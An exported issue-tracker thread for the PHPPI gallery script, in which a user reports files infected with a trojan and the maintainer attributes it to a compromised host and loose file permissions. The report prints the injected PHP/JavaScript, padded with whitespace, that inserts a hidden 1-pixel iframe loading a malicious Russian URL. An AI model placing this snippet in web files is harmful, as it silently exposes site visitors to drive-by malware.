virus in files???

[GoogleCodeExporter]

What steps will reproduce the problem?
1.Install a fres PHPPI (1.1.1 or 1.2.0)
2.wait a few days
3.some php or/and js file modified a virus

What is the expected output? What do you see instead?
My NOD32 antivirus report JS/Iframe.GJ trojan

What version of PHPPI are you using? On what operating system?
1.1.1 or 1.2.0

Please provide any additional information below.
the following code added to a php file

<?
#04b037#
                                                                                                                                                                                                                                                          echo "                                                                                                                                                                                                                                                          <script type=\"text/javascript\" language=\"javascript\" >                                                                                                                                                                                                                                                          (function () {    var ykp = document.createElement('iframe');    ykp.src = 'http://fawsilom.ru/count8.php';    ykp.style.position = 'absolute';    ykp.style.border = '0';    ykp.style.height = '1px';    ykp.style.width = '1px';    ykp.style.left = '1px';    ykp.style.top = '1px';    if (!document.getElementById('ykp')) {        document.write('<div id=\'ykp\'></div>');        document.getElementById('ykp').appendChild(ykp);    }})();</script>";

#/04b037#
?>

only this script modified on my site
www.fordcapri.hu/phpalbum

sorry for my poor english.

Original issue reported on code.google.com by eekl...@gmail.com on 6 Jan 2013 at 9:38

[GoogleCodeExporter]

I could not find that code in any files from PHPPI. I would have to say that 
you're being hacked. Check your permissions for files and or folders. If you 
have them set to allow read and write from everyone then your files can be 
edited/hacked.

As an example you can see that this particular hack is quite common, if you 
search google for http://fawsilom.ru/count8.php you will find many results with 
websites that have been hacked (I would advise against visiting any of those 
sites)

Just for curiosity which php file is edited when you do get hacked?

Original comment by gorounreal on 7 Jan 2013 at 10:15

[GoogleCodeExporter]

infected files:

index.php
phppi_js.js
jquery.js
jquery.fancybox.js
admin/index.php

if I set the permission 444, it's not midified any file. If the files 
permission 644, some files modified. my joomla files not, only the phppi files. 
only the cache dir 777. I will contact my server admin. thank you for your help.

Original comment by eekl...@gmail.com on 7 Jan 2013 at 2:36

[GoogleCodeExporter]

Due to this issue more than likely caused by the host's security measures and 
no viruses/malicious code in the original source i'm closing this ticket. If 
there are further reports from other users I will look into the issue.

Original comment by gorounreal on 18 Jan 2013 at 10:38

• Changed state: WontFix